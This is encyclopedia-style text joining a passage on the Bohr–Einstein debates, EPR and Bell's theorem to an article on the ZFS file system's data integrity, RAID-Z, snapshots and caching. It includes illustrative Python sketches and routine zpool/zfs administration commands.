The longer that the observer allows the damped spring-mass system to settle, the closer the pointer will reach its equilibrium position. At some point, the observer will conclude that his setting of the pointer to its initial position is within an allowable tolerance. There will be some residual error δq in returning the pointer to its initial position. Correspondingly, there will be some residual error δm in the weight measurement. 4. Adding the weights imparts a momentum p to the box which can be measured with an accuracy δp delimited by δp δq ≈ h. It is clear that δp < t g δm, where g is the gravitational acceleration and t is the time taken to perform the weighing procedure. Plugging in yields t g δm δq > h. 5. General relativity informs us that while the box has been at a height different than its original height, it has been ticking at a rate different than its original rate. The red shift formula informs us that there will be an uncertainty δt = (g δq/c²) t in the determination of the emission time of the photon. 6. Hence, c² δm δt = δE δt > h. The accuracy with which the energy of the photon is measured restricts the precision with which its moment of emission can be measured, following the Heisenberg uncertainty principle. After seeing his last attempt at finding a loophole around the uncertainty principle refuted, Einstein quit trying to search for inconsistencies in quantum mechanics. Instead, he shifted his focus to the other aspects of quantum mechanics with which he was uncomfortable, focusing on his critique of action at a distance. His next paper on quantum mechanics foreshadowed his later paper on the EPR paradox. Einstein was gracious in his defeat. The following September, Einstein nominated Heisenberg and Schroedinger for the Nobel Prize, stating, "I am convinced that this theory undoubtedly contains a part of the ultimate truth."

EPR Paradox

Einstein's fundamental dispute with quantum mechanics was not about whether God rolled dice, whether the uncertainty principle allowed simultaneous measurement of position and momentum, or even whether quantum mechanics was complete. It was about reality. 
Does a physical reality exist independent of our ability to observe it? To Bohr and his followers, such questions were meaningless. All that we can know are the results of measurements and observations. It makes no sense to speculate about an ultimate reality that exists beyond our perceptions. Einstein's beliefs had evolved over the years from those that he had held when he was young, when, as a logical positivist heavily influenced by his reading of David Hume and Ernst Mach, he had rejected such unobservable concepts as absolute time and space. Einstein believed: 1. A reality exists independent of our ability to observe it. 2. Objects are located at distinct points in spacetime and have their own independent, real existence. In other words, he believed in separability and locality. 3. Although at a superficial level, quantum events may appear random, at some ultimate level, strict causality underlies all processes in nature. Einstein considered that realism and localism were fundamental underpinnings of physics. After leaving Nazi Germany and settling in Princeton at the Institute for Advanced Study, Einstein began writing up a thought experiment that he had been mulling over since attending a lecture by Léon Rosenfeld in 1933. Since the paper was to be in English, Einstein enlisted the help of the 46-year-old Boris Podolsky, a fellow who had moved to the institute from Caltech, and that of the 26-year-old Nathan Rosen, also at the institute, who did much of the math. The result of their collaboration was the four-page EPR paper, which in its title asked the question Can Quantum-Mechanical Description of Physical Reality be Considered Complete? After seeing the paper in print, Einstein found himself unhappy with the result. His clear conceptual visualization had been buried under layers of mathematical formalism. 
Einstein's thought experiment involved two particles that have collided or which have been created in such a way that they have properties which are correlated. The total wave function for the pair links the positions of the particles as well as their linear momenta. The figure depicts the spreading of the wave function from the collision point. However, observation of the position of the first particle allows us to determine precisely the position of the second particle no matter how far the pair have separated. Likewise, measuring the momentum of the first particle allows us to determine precisely the momentum of the second particle. "In accordance with our criterion for reality, in the first case we must consider the quantity P as being an element of reality, in the second case the quantity Q is an element of reality." Einstein concluded that the second particle, which we have never directly observed, must have at any moment a position that is real and a momentum that is real. Quantum mechanics does not account for these features of reality. Therefore, quantum mechanics is not complete. It is known, from the uncertainty principle, that position and momentum cannot be measured at the same time. But even though their values can only be determined in distinct contexts of measurement, can they both be definite at the same time? Einstein concluded that the answer must be yes. The only alternative, claimed Einstein, would be to assert that measuring the first particle instantaneously affected the reality of the position and momentum of the second particle. "No reasonable definition of reality could be expected to permit this." Bohr was stunned when he read Einstein's paper and spent more than six weeks framing his response, which he gave exactly the same title as the EPR paper. The EPR paper forced Bohr to make a major revision in his understanding of complementarity in the Copenhagen interpretation of quantum mechanics. 
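The EPR correlations are easiest to exhibit in the spin-½ version later popularized by David Bohm, where the correlated quantity is a pair of two-valued measurement outcomes rather than continuous position and momentum. The sketch below (state and variable names are illustrative, not from the paper) writes down the singlet state and checks that measurements along a shared axis are perfectly anticorrelated:

```python
import math

# Spin-singlet state (|01> - |10>)/sqrt(2): real amplitudes indexed by the
# pair of measurement outcomes (first particle's bit, second particle's bit)
# along one shared axis.
amp = {(0, 0): 0.0,
       (0, 1): 1 / math.sqrt(2),
       (1, 0): -1 / math.sqrt(2),
       (1, 1): 0.0}

# Born rule: the joint probability of an outcome pair is the squared amplitude.
prob = {outcome: a * a for outcome, a in amp.items()}

p_disagree = prob[(0, 1)] + prob[(1, 0)]  # outcomes differ
p_agree = prob[(0, 0)] + prob[(1, 1)]     # outcomes coincide
print(p_disagree, p_agree)  # perfectly anticorrelated, however far apart
```

Measuring the first particle thus fixes with certainty what the second measurement will yield, which is the structure Einstein's reality criterion seizes on.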
Prior to EPR, Bohr had maintained that disturbance caused by the act of observation was the physical explanation for quantum uncertainty. In the EPR thought experiment, however, Bohr had to admit that "there is no question of a mechanical disturbance of the system under investigation." On the other hand, he noted that the two particles were one system described by one quantum function. Furthermore, the EPR paper did nothing to dispel the uncertainty principle. Later commentators have questioned the strength and coherence of Bohr's response. As a practical matter, however, physicists for the most part did not pay much attention to the debate between Bohr and Einstein, since the opposing views did not affect one's ability to apply quantum mechanics to practical problems, but only affected one's interpretation of the quantum formalism. If they thought about the problem at all, most working physicists tended to follow Bohr's leadership. So stood the situation for nearly 30 years. Then, in 1964, John Stewart Bell made the groundbreaking discovery that Einstein's local realist world view made experimentally verifiable predictions that would be in conflict with those of quantum mechanics. Bell's discovery shifted the Einstein–Bohr debate from philosophy to the realm of experimental physics. Bell's theorem showed that, for any local realist formalism, there exist limits on the predicted correlations between pairs of particles in an experimental realization of the EPR thought experiment. In 1972, the first experimental tests were carried out. Successive experiments improved the accuracy of observation and closed loopholes. To date, it is virtually certain that local realist theories have been falsified. So Einstein was wrong. But after decades of relative neglect, the EPR paper has been recognized as prescient, since it identified the phenomenon of quantum entanglement. 
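Bell's limit on local realist correlations is most often stated in the CHSH form: any local realist model obeys S ≤ 2, while quantum mechanics predicts up to 2√2. A short check, using the singlet correlation E(a, b) = −cos(a − b) and a conventional (here assumed) set of measurement angles:

```python
import math

# Quantum correlation between spin measurements at angles a and b
# on a singlet pair: E(a, b) = -cos(a - b).
def E(a: float, b: float) -> float:
    return -math.cos(a - b)

# Conventional CHSH angle choices for the two observers.
a, a2 = 0.0, math.pi / 2
b, b2 = math.pi / 4, 3 * math.pi / 4

S = abs(E(a, b) - E(a, b2) + E(a2, b) + E(a2, b2))
print(S)  # approximately 2*sqrt(2), exceeding the local-realist bound of 2
```

The experiments cited above measure exactly this kind of correlation sum and find values above 2, which is what rules out the local realist alternatives.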
It has several times been the case that Einstein's "mistakes" have foreshadowed and provoked major shifts in scientific research. Such, for instance, has been the case with his proposal of the cosmological constant, which Einstein considered his greatest blunder, but which currently is being actively investigated for its possible role in the accelerating expansion of the universe. In his Princeton years, Einstein was virtually shunned as he pursued the unified field theory. Nowadays, innumerable physicists pursue Einstein's dream for a "theory of everything." The EPR paper did not prove quantum mechanics to be incorrect. What it did prove was that quantum mechanics, with its "spooky action at a distance," is completely incompatible with commonsense understanding. Furthermore, the effect predicted by the EPR paper, quantum entanglement, has inspired approaches to quantum mechanics different from the Copenhagen interpretation, and has been at the forefront of major technological advances in quantum computing, quantum encryption, and quantum information theory.
ZFS
ZFS (previously: Zettabyte file system) combines a file system with a volume manager. It began as part of the Sun Microsystems Solaris operating system in 2001. Large parts of Solaris – including ZFS – were published under an open source license as OpenSolaris for around 5 years from 2005, before being placed under a closed source license when Oracle Corporation acquired Sun in 2009/2010. Between 2005 and 2010, the open source version of ZFS was ported to Linux, Mac OS X (continued as MacZFS) and FreeBSD. In 2010, the illumos project forked a recent version of OpenSolaris, to continue its development as an open source project, including ZFS. In 2013, OpenZFS was founded to coordinate the development of open source ZFS. OpenZFS maintains and manages the core ZFS code, while organizations using ZFS maintain the specific code and validation processes required for ZFS to integrate within their systems. OpenZFS is widely used in Unix-like systems.

Overview

The management of stored data generally involves two aspects: the physical volume management of one or more block storage devices such as hard drives and SD cards and their organization into logical block devices as seen by the operating system (often involving a volume manager, RAID controller, array manager, or suitable device driver), and the management of data and files that are stored on these logical block devices (a file system or other data storage). Example: A RAID array of 2 hard drives and an SSD caching disk is controlled by Intel's RST system, part of the chipset and firmware built into a desktop computer. The Windows user sees this as a single volume, containing an NTFS-formatted drive of their data, and NTFS is not necessarily aware of the manipulations that may be required (such as reading from/writing to the cache drive or rebuilding the RAID array if a disk fails). 
The management of the individual devices and their presentation as a single device is distinct from the management of the files held on that apparent device. ZFS is unusual because, unlike most other storage systems, it unifies both of these roles and acts as both the volume manager and the file system. Therefore, it has complete knowledge of both the physical disks and volumes (including their condition and status, their logical arrangement into volumes), and also of all the files stored on them. ZFS is designed to ensure (subject to suitable hardware) that data stored on disks cannot be lost due to physical errors or misprocessing by the hardware or operating system, or bit rot events and data corruption which may happen over time, and its complete control of the storage system is used to ensure that every step, whether related to file management or disk management, is verified, confirmed, corrected if needed, and optimized, in a way that storage controller cards and separate volume and file managers cannot achieve. ZFS also includes a mechanism for dataset and pool-level snapshots and replication, including snapshot cloning which is described by the FreeBSD documentation as one of its "most powerful features", having features that "even other file systems with snapshot functionality lack". Very large numbers of snapshots can be taken, without degrading performance, allowing snapshots to be used prior to risky system operations and software changes, or an entire production ("live") file system to be fully snapshotted several times an hour, in order to mitigate data loss due to user error or malicious activity. Snapshots can be rolled back "live" or previous file system states can be viewed, even on very large file systems, leading to savings in comparison to formal backup and restore processes. Snapshots can also be cloned to form new independent file systems. 
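Snapshots are cheap because of ZFS's copy-on-write design: a snapshot is essentially a retained reference to an older block tree, not a copy of the data. The toy Python model below (class and method names are invented for illustration; real ZFS operates on disk blocks, not dictionaries) shows why taking a snapshot is a constant-time operation:

```python
# Toy model of copy-on-write snapshots -- an illustration, not ZFS code.
# The "root" mapping is never mutated in place; writes build a new root,
# so a snapshot is just a saved reference to the old root.

class CowStore:
    def __init__(self):
        self.root = {}          # filename -> content
        self.snapshots = {}     # label -> saved root reference

    def write(self, name, data):
        new_root = dict(self.root)   # copy-on-write at the "tree" level
        new_root[name] = data
        self.root = new_root

    def snapshot(self, label):
        self.snapshots[label] = self.root   # O(1): shares all existing data

    def rollback(self, label):
        self.root = self.snapshots[label]

store = CowStore()
store.write("a.txt", "v1")
store.snapshot("before-change")
store.write("a.txt", "v2")          # snapshot is unaffected
store.rollback("before-change")
print(store.root["a.txt"])  # v1
```

Because nothing is copied when a snapshot is taken, very large numbers of snapshots cost only the space of blocks that later diverge, which is what makes hourly snapshotting of a live file system practical.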
A pool level snapshot (known as a "checkpoint") is available which allows rollback of operations that may affect the entire pool's structure, or which add or remove entire datasets. History Sun Microsystems (to 2010) In 1987, AT&T Corporation and Sun announced that they were collaborating on a project to merge the most popular Unix variants on the market at that time: Berkeley Software Distribution, UNIX System V, and Xenix. This became Unix System V Release 4 (SVR4). The project was released under the name Solaris, which became the successor to SunOS 4 (although SunOS 4.1.x micro releases were retroactively named Solaris 1). ZFS was designed and implemented by a team at Sun led by Jeff Bonwick, Bill Moore and Matthew Ahrens. It was announced on September 14, 2004, but development started in 2001. Source code for ZFS was integrated into the main trunk of Solaris development on October 31, 2005, and released for developers as part of build 27 of OpenSolaris on November 16, 2005. In June 2006, Sun announced that ZFS was included in the mainstream 6/06 update to Solaris 10. Solaris was originally developed as proprietary software, but Sun Microsystems was an early commercial proponent of open source software and in June 2005 released most of the Solaris codebase under the CDDL license and founded the OpenSolaris open-source project. In Solaris 10 6/06 ("U2"), Sun added the ZFS file system and during the next 5 years frequently updated ZFS with new features. ZFS was ported to Linux, Mac OS X (continued as MacZFS) and FreeBSD, under this open source license. The name at one point was said to stand for "Zettabyte File System", but by 2006, the name was no longer considered to be an abbreviation. A ZFS file system can store up to 256 quadrillion zettabytes (ZB). In September 2007, NetApp sued Sun claiming that ZFS infringed some of NetApp's patents on Write Anywhere File Layout. Sun counter-sued in October the same year claiming the opposite. 
The lawsuits were ended in 2010 with an undisclosed settlement.

Later development

Ported versions of ZFS began to appear in 2005. After the Sun acquisition by Oracle in 2010, Oracle's version of ZFS became closed source and development of open-source versions proceeded independently, coordinated by OpenZFS from 2013.

Features

Summary

Examples of features specific to ZFS include:
- Designed for long-term storage of data, and indefinitely scaled datastore sizes with zero data loss, and high configurability.
- Hierarchical checksumming of all data and metadata, ensuring that the entire storage system can be verified on use, and confirmed to be correctly stored, or remedied if corrupt. Checksums are stored with a block's parent block, rather than with the block itself. This contrasts with many file systems where checksums (if held) are stored with the data so that if the data is lost or corrupt, the checksum is also likely to be lost or incorrect.
- Can store a user-specified number of copies of data or metadata, or selected types of data, to improve the ability to recover from data corruption of important files and structures.
- Automatic rollback of recent changes to the file system and data, in some circumstances, in the event of an error or inconsistency.
- Automated and (usually) silent self-healing of data inconsistencies and write failure when detected, for all errors where the data is capable of reconstruction. Data can be reconstructed using all of the following: error detection and correction checksums stored in each block's parent block; multiple copies of data (including checksums) held on the disk; write intentions logged on the SLOG (ZIL) for writes that should have occurred but did not occur (after a power failure); parity data from RAID/RAID-Z disks and volumes; copies of data from mirrored disks and volumes.
- Native handling of standard RAID levels and additional ZFS RAID layouts ("RAID-Z"). The RAID-Z levels stripe data across only the disks required, for efficiency (many RAID systems stripe indiscriminately across all devices), and checksumming allows rebuilding of inconsistent or corrupted data to be minimized to those blocks with defects.
- Native handling of tiered storage and caching devices, which is usually a volume related task. Because ZFS also understands the file system, it can use file-related knowledge to inform, integrate and optimize its tiered storage handling which a separate device cannot.
- Native handling of snapshots and backup/replication which can be made efficient by integrating the volume and file handling. Relevant tools are provided at a low level and require external scripts and software for utilization.
- Native data compression and deduplication, although the latter is largely handled in RAM and is memory hungry.
- Efficient rebuilding of RAID arrays: a RAID controller often has to rebuild an entire disk, but ZFS can combine disk and file knowledge to limit any rebuilding to data which is actually missing or corrupt, greatly speeding up rebuilding.
- Unaffected by RAID hardware changes which affect many other systems. On many systems, if self-contained RAID hardware such as a RAID card fails, or the data is moved to another RAID system, the file system will lack information that was on the original RAID hardware, which is needed to manage data on the RAID array. This can lead to a total loss of data unless near-identical hardware can be acquired and used as a "stepping stone". Since ZFS manages RAID itself, a ZFS pool can be migrated to other hardware, or the operating system can be reinstalled, and the RAID-Z structures and data will be recognized and immediately accessible by ZFS again.
- Ability to identify data that would have been found in a cache but has been discarded recently instead; this allows ZFS to reassess its caching decisions in light of later use and facilitates very high cache-hit levels (ZFS cache hit rates are typically over 80%).
- Alternative caching strategies can be used for data that would otherwise cause delays in data handling. For example, synchronous writes which are capable of slowing down the storage system can be converted to asynchronous writes by being written to a fast separate caching device, known as the SLOG (sometimes called the ZIL – ZFS Intent Log).
- Highly tunable: many internal parameters can be configured for optimal functionality.
- Can be used for high availability clusters and computing, although not fully designed for this use.

Data integrity

One major feature that distinguishes ZFS from other file systems is that it is designed with a focus on data integrity by protecting the user's data on disk against silent data corruption caused by data degradation, power surges (voltage spikes), bugs in disk firmware, phantom writes (the previous write did not make it to disk), misdirected reads/writes (the disk accesses the wrong block), DMA parity errors between the array and server memory or from the driver (since the checksum validates data inside the array), driver errors (data winds up in the wrong buffer inside the kernel), accidental overwrites (such as swapping to a live file system), etc. A 1999 study showed that none of the then-major and widespread filesystems (such as UFS, Ext, XFS, JFS, or NTFS), nor hardware RAID (which has some issues with data integrity), provided sufficient protection against data corruption problems. Initial research indicates that ZFS protects data better than earlier efforts. It is also faster than UFS and can be seen as its replacement. Within ZFS, data integrity is achieved by using a Fletcher-based checksum or a SHA-256 hash throughout the file system tree. 
Each block of data is checksummed and the checksum value is then saved in the pointer to that block, rather than with the actual block itself. Next, the block pointer is checksummed, with the value being saved at its pointer. This checksumming continues all the way up the file system's data hierarchy to the root node, which is also checksummed, thus creating a Merkle tree. In-flight data corruption or phantom reads/writes (the data written/read checksums correctly but is actually wrong) are undetectable by most filesystems as they store the checksum with the data. ZFS stores the checksum of each block in its parent block pointer so the entire pool self-validates. When a block is accessed, regardless of whether it is data or meta-data, its checksum is calculated and compared with the stored checksum value of what it "should" be. If the checksums match, the data are passed up the programming stack to the process that asked for it; if the values do not match, then ZFS can heal the data if the storage pool provides data redundancy (such as with internal mirroring), assuming that the copy of data is undamaged and with matching checksums. It is optionally possible to provide additional in-pool redundancy by specifying copies=2 (or copies=3 or more), which means that data will be stored twice (or three times) on the disk, effectively halving (or, for copies=3, reducing to one third) the storage capacity of the disk. Additionally some kinds of data used by ZFS to manage the pool are stored multiple times by default for safety, even with the default copies=1 setting. If other copies of the damaged data exist or can be reconstructed from checksums and parity data, ZFS will use a copy of the data (or recreate it via a RAID recovery mechanism), and recalculate the checksum, ideally resulting in the reproduction of the originally expected value. If the data passes this integrity check, the system can then update all faulty copies with known-good data and redundancy will be restored. 
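The checksum-in-parent arrangement can be sketched as a tiny Merkle tree using only `hashlib` (a deliberately simplified two-level model with invented function names, not ZFS's actual block-pointer format):

```python
import hashlib

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def root_digest(blocks) -> bytes:
    # The parent "block" holds its children's checksums and is itself
    # checksummed, so the root digest covers every block beneath it.
    parent = b"".join(sha256(b) for b in blocks)
    return sha256(parent)

blocks = [b"data-block-0", b"data-block-1", b"data-block-2"]
expected = root_digest(blocks)

blocks[1] = b"data-block-X"  # simulate silent corruption of one block
corrupted = root_digest(blocks)

print(expected != corrupted)  # True: the corruption is visible at the root
```

Because the checksum of a damaged block lives in its (undamaged) parent, corruption of the block cannot also corrupt the evidence against it, which is the property that lets the whole pool self-validate.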
Consistency of data held in memory, such as cached data in the ARC, is not checked by default, as ZFS is expected to run on enterprise-quality hardware with error correcting RAM, but the capability to check in-memory data exists and can be enabled using "debug flags". RAID ("RAID-Z") For ZFS to be able to guarantee data integrity, it needs multiple copies of the data, usually spread across multiple disks. Typically this is achieved by using either a RAID controller or so-called "soft" RAID (built into a file system). Avoidance of hardware RAID controllers While ZFS can work with hardware RAID devices, ZFS will usually work more efficiently and with greater data protection if it has raw access to all storage devices. ZFS relies on the disk for an honest view to determine the moment data is confirmed as safely written and it has numerous algorithms designed to optimize its use of caching, cache flushing, and disk handling. Disks connected to the system using a hardware, firmware, other "soft" RAID, or any other controller that modifies the ZFS-to-disk I/O path will affect ZFS performance and data integrity. If a third-party device performs caching or presents drives to ZFS as a single system without the low level view ZFS relies upon, there is a much greater chance that the system will perform less optimally and that ZFS will be less likely to prevent failures, recover from failures more slowly, or lose data due to a write failure. For example, if a hardware RAID card is used, ZFS may not be able to: determine the condition of disks; determine if the RAID array is degraded or rebuilding; detect all data corruption; place data optimally across the disks; make selective repairs; control how repairs are balanced with ongoing use; or make repairs that ZFS could usually undertake. The hardware RAID card will interfere with ZFS' algorithms. RAID controllers also usually add controller-dependent data to the drives which prevents software RAID from accessing the user data. 
In the case of a hardware RAID controller failure, it may be possible to read the data with another compatible controller, but this isn't always possible and a replacement may not be available. Alternate hardware RAID controllers may not understand the original manufacturer's custom data required to manage and restore an array. Unlike most other systems where RAID cards or similar hardware can offload resources and processing to enhance performance and reliability, with ZFS it is strongly recommended that these methods not be used as they typically reduce the system's performance and reliability. If disks must be attached through a RAID or other controller, it is recommended to minimize the amount of processing done in the controller by using a plain HBA (host adapter), a simple fanout card, or configure the card in JBOD mode (i.e. turn off RAID and caching functions), to allow devices to be attached with minimal changes in the ZFS-to-disk I/O pathway. A RAID card in JBOD mode may still interfere if it has a cache or, depending upon its design, may detach drives that do not respond in time (as has been seen with many energy-efficient consumer-grade hard drives), and as such, may require Time-Limited Error Recovery (TLER)/CCTL/ERC-enabled drives to prevent drive dropouts, so not all cards are suitable even with RAID functions disabled. ZFS's approach: RAID-Z and mirroring Instead of hardware RAID, ZFS employs "soft" RAID, offering RAID-Z (parity based like RAID 5 and similar) and disk mirroring (similar to RAID 1). The schemes are highly flexible. RAID-Z is a data/parity distribution scheme like RAID-5, but uses dynamic stripe width: every block is its own RAID stripe, regardless of blocksize, resulting in every RAID-Z write being a full-stripe write. This, when combined with the copy-on-write transactional semantics of ZFS, eliminates the write hole error. 
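Parity-based reconstruction itself is simple arithmetic; the sketch below uses plain XOR parity in the spirit of RAID-Z1 (a simplification: real RAID-Z adds variable stripe width and, for RAID-Z2/Z3, more elaborate parity mathematics):

```python
# Simplified single-parity stripe: the parity block is the byte-wise XOR
# of the data blocks, so any one missing block can be recomputed from the
# survivors. Illustration only, not ZFS's on-disk layout.

def xor_parity(blocks):
    parity = bytearray(len(blocks[0]))
    for block in blocks:
        for i, byte in enumerate(block):
            parity[i] ^= byte
    return bytes(parity)

stripe = [b"AAAA", b"BBBB", b"CCCC"]      # data blocks on three disks
parity = xor_parity(stripe)               # stored on a fourth disk

# Suppose the disk holding the second block fails: recover its contents
# from the surviving data blocks plus the parity block.
recovered = xor_parity([stripe[0], stripe[2], parity])
print(recovered)  # b'BBBB'
```

What ZFS adds on top of this arithmetic is the checksum check: after reconstruction, the recovered block is verified against the checksum in its parent, so a disk that silently returned bad data is identified rather than trusted.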
RAID-Z is also faster than traditional RAID 5 because it does not need to perform the usual read-modify-write sequence. As all stripes are of different sizes, RAID-Z reconstruction has to traverse the filesystem metadata to determine the actual RAID-Z geometry. This would be impossible if the filesystem and the RAID array were separate products, whereas it becomes feasible when there is an integrated view of the logical and physical structure of the data. Going through the metadata means that ZFS can validate every block against its 256-bit checksum as it goes, whereas traditional RAID products usually cannot do this. In addition to handling whole-disk failures, RAID-Z can also detect and correct silent data corruption, offering "self-healing data": when reading a RAID-Z block, ZFS compares it against its checksum, and if the data disks did not return the right answer, ZFS reads the parity and then figures out which disk returned bad data. Then, it repairs the damaged data and returns good data to the requestor. RAID-Z and mirroring do not require any special hardware: they do not need NVRAM for reliability, and they do not need write buffering for good performance or data protection. With RAID-Z, ZFS provides fast, reliable storage using cheap, commodity disks. There are five different RAID-Z modes: striping (similar to RAID 0, offers no redundancy), RAID-Z1 (similar to RAID 5, allows one disk to fail), RAID-Z2 (similar to RAID 6, allows two disks to fail), RAID-Z3 (a RAID 7 configuration, allows three disks to fail), and mirroring (similar to RAID 1, allows all but one disk to fail). The need for RAID-Z3 arose in the early 2000s as multi-terabyte capacity drives became more common. This increase in capacity—without a corresponding increase in throughput speeds—meant that rebuilding an array due to a failed drive could "easily take weeks or months" to complete. 
During this time, the older disks in the array will be stressed by the additional workload, which could result in data corruption or drive failure. By increasing parity, RAID-Z3 reduces the chance of data loss by simply increasing redundancy. Resilvering and scrub (array syncing and integrity checking) ZFS has no tool equivalent to fsck (the standard Unix and Linux data checking and repair tool for file systems). Instead, ZFS has a built-in scrub function which regularly examines all data and repairs silent corruption and other problems. Some differences are: fsck must be run on an offline filesystem, which means the filesystem must be unmounted and is not usable while being repaired, while scrub is designed to be used on a mounted, live filesystem, and does not need the ZFS filesystem to be taken offline. fsck usually only checks metadata (such as the journal log) but never checks the data itself. This means, after an fsck, the data might still not match the original data as stored. fsck cannot always validate and repair data when checksums are stored with data (often the case in many file systems), because the checksums may also be corrupted or unreadable. ZFS always stores checksums separately from the data they verify, improving reliability and the ability of scrub to repair the volume. ZFS also stores multiple copies of data—metadata, in particular, may have upwards of 4 or 6 copies (multiple copies per disk and multiple disk mirrors per volume), greatly improving the ability of scrub to detect and repair extensive damage to the volume, compared to fsck. scrub checks everything, including metadata and the data. The effect can be observed by comparing fsck to scrub times—sometimes a fsck on a large RAID completes in a few minutes, which means only the metadata was checked. Traversing all metadata and data on a large RAID takes many hours, which is exactly what scrub does. 
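A scrub of the kind described above is started and monitored with the `zpool` command while the pool stays mounted and in use; the pool name below is a placeholder:

```shell
# Examine all data and metadata of the (hypothetical) pool "tank" while it stays online.
zpool scrub tank
# Report progress, any repaired blocks, and any unrecoverable errors.
zpool status -v tank
```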
The official recommendation from Sun/Oracle is to scrub enterprise-level disks once a month, and cheaper commodity disks once a week. Capacity ZFS is a 128-bit file system, so it can address 1.84 × 10^19 times more data than 64-bit systems such as Btrfs. The maximum limits of ZFS are designed to be so large that they should never be encountered in practice. For instance, fully populating a single zpool with 2^128 bits of data would require 3×10^24 TB hard disk drives. Some theoretical limits in ZFS are: 16 exbibytes (2^64 bytes): maximum size of a single file 2^48: number of entries in any individual directory 16 exbibytes: maximum size of any attribute 2^56: number of attributes of a file (actually constrained to 2^48 for the number of files in a directory) 256 quadrillion zebibytes (2^128 bytes): maximum size of any zpool 2^64: number of devices in any zpool 2^64: number of file systems in a zpool 2^64: number of zpools in a system Encryption With Oracle Solaris, the encryption capability in ZFS is embedded into the I/O pipeline. During writes, a block may be compressed, encrypted, checksummed and then deduplicated, in that order. The policy for encryption is set at the dataset level when datasets (file systems or ZVOLs) are created. The wrapping keys provided by the user/administrator can be changed at any time without taking the file system offline. The default behaviour is for the wrapping key to be inherited by any child data sets. The data encryption keys are randomly generated at dataset creation time. Only descendant datasets (snapshots and clones) share data encryption keys. A command to switch to a new data encryption key for the clone or at any time is provided; this does not re-encrypt already existing data, instead utilising an encrypted master-key mechanism. The encryption feature is also fully integrated into OpenZFS 0.8.0, available for Debian and Ubuntu Linux distributions.
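With OpenZFS 0.8 native encryption, the per-dataset policy described above might be set up along the following lines; pool and dataset names are placeholders:

```shell
# Encryption is chosen when the dataset is created and cannot be toggled on later.
zfs create -o encryption=on -o keyformat=passphrase tank/secure
# After an export or reboot, load the wrapping key and mount the dataset.
zfs load-key tank/secure
zfs mount tank/secure
# Change the user-supplied wrapping key without re-encrypting data or going offline;
# the underlying data encryption keys are untouched.
zfs change-key tank/secure
```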
Read/write efficiency ZFS will automatically allocate data storage across all vdevs in a pool (and all devices in each vdev) in a way that generally maximises the performance of the pool. ZFS will also update its write strategy to take account of new disks added to a pool, when they are added. As a general rule, ZFS allocates writes across vdevs based on the free space in each vdev. This ensures that vdevs which already hold proportionately less data are given more writes when new data is to be stored. This helps to ensure that as the pool becomes more used, the situation does not develop that some vdevs become full, forcing writes to occur on a limited number of devices. It also means that when data is read (and reads are much more frequent than writes in most uses), different parts of the data can be read from as many disks as possible at the same time, giving much higher read performance. Therefore, as a general rule, pools and vdevs should be managed and new storage added, so that the situation does not arise that some vdevs in a pool are almost full and others almost empty, as this will make the pool less efficient. Other features Storage devices, spares, and quotas Pools can have hot spares to compensate for failing disks. When mirroring, block devices can be grouped according to physical chassis, so that the filesystem can continue in the case of the failure of an entire chassis. Storage pool composition is not limited to similar devices, but can consist of ad-hoc, heterogeneous collections of devices, which ZFS seamlessly pools together, subsequently doling out space as needed. Arbitrary storage device types can be added to existing pools to expand their size. The storage capacity of all vdevs is available to all of the file system instances in the zpool. A quota can be set to limit the amount of space a file system instance can occupy, and a reservation can be set to guarantee that space will be available to a file system instance.
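The spares, quotas, and reservations just described are each a one-line administrative command; all pool, dataset, and device names below are placeholders:

```shell
# Attach a hot spare that ZFS can resilver onto if a member disk fails.
zpool add tank spare da9
# Cap one filesystem at 10 GiB of pool space, and guarantee another 5 GiB.
zfs set quota=10G tank/projects
zfs set reservation=5G tank/databases
# Per-vdev capacity view, useful for spotting unevenly filled vdevs.
zpool list -v tank
```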
Caching mechanisms: ARC, L2ARC, Transaction groups, ZIL, SLOG, Special VDEV ZFS uses different layers of disk cache to speed up read and write operations. Ideally, all data should be stored in RAM, but that is usually too expensive. Therefore, data is automatically cached in a hierarchy to optimize performance versus cost; these are often called "hybrid storage pools". Frequently accessed data will be stored in RAM, and less frequently accessed data can be stored on slower media, such as solid state drives (SSDs). Data that is not often accessed is not cached and left on the slow hard drives. If old data is suddenly read a lot, ZFS will automatically move it to SSDs or to RAM. ZFS caching mechanisms include one each for reads and writes, and in each case, two levels of caching can exist, one in computer memory (RAM) and one on fast storage (usually solid state drives (SSDs)), for a total of four caches. A number of other caches, cache divisions, and queues also exist within ZFS. For example, each VDEV has its own data cache, and the ARC cache is divided between data stored by the user and metadata used by ZFS, with control over the balance between these. Special VDEV Class In OpenZFS 0.8 and later, it is possible to configure a Special VDEV class to preferentially store filesystem metadata, and optionally the Data Deduplication Table (DDT), and small filesystem blocks. This allows, for example, a Special VDEV to be created on fast solid-state storage to store the metadata, while the regular file data is stored on spinning disks. This speeds up metadata-intensive operations such as filesystem traversal, scrub, and resilver, without the expense of storing the entire filesystem on solid-state storage. Copy-on-write transactional model ZFS uses a copy-on-write transactional object model.
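The cache and special-vdev layers described above are configured per pool; a sketch, with all device and pool names as placeholders:

```shell
# Device and pool names are hypothetical.
zpool add tank cache nvme0               # L2ARC: second-level read cache on fast storage
zpool add tank log mirror nvme1 nvme2    # SLOG: dedicated, mirrored intent-log (ZIL) device
# OpenZFS 0.8+: special vdev for metadata (mirrored, since losing it loses the pool),
# optionally also holding small data blocks up to a cutoff size.
zpool add tank special mirror ssd0 ssd1
zfs set special_small_blocks=32K tank
```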
All block pointers within the filesystem contain a 256-bit checksum or 256-bit hash (currently a choice between Fletcher-2, Fletcher-4, or SHA-256) of the target block, which is verified when the block is read. Blocks containing active data are never overwritten in place; instead, a new block is allocated, modified data is written to it, then any metadata blocks referencing it are similarly read, reallocated, and written. To reduce the overhead of this process, multiple updates are grouped into transaction groups, and ZIL (intent log) write cache is used when synchronous write semantics are required. The blocks are arranged in a tree, as are their checksums (see Merkle signature scheme). Snapshots and clones An advantage of copy-on-write is that, when ZFS writes new data, the blocks containing the old data can be retained, allowing a snapshot version of the file system to be maintained. ZFS snapshots are consistent (they reflect the entire data as it existed at a single point in time), and can be created extremely quickly, since all the data composing the snapshot is already stored, with the entire storage pool often snapshotted several times per hour. They are also space efficient, since any unchanged data is shared among the file system and its snapshots. Snapshots are inherently read-only, ensuring they will not be modified after creation, although they should not be relied on as a sole means of backup. Entire snapshots can be restored and also files and directories within snapshots. Writeable snapshots ("clones") can also be created, resulting in two independent file systems that share a set of blocks. As changes are made to any of the clone file systems, new data blocks are created to reflect those changes, but any unchanged blocks continue to be shared, no matter how many clones exist. This is an implementation of the Copy-on-write principle. 
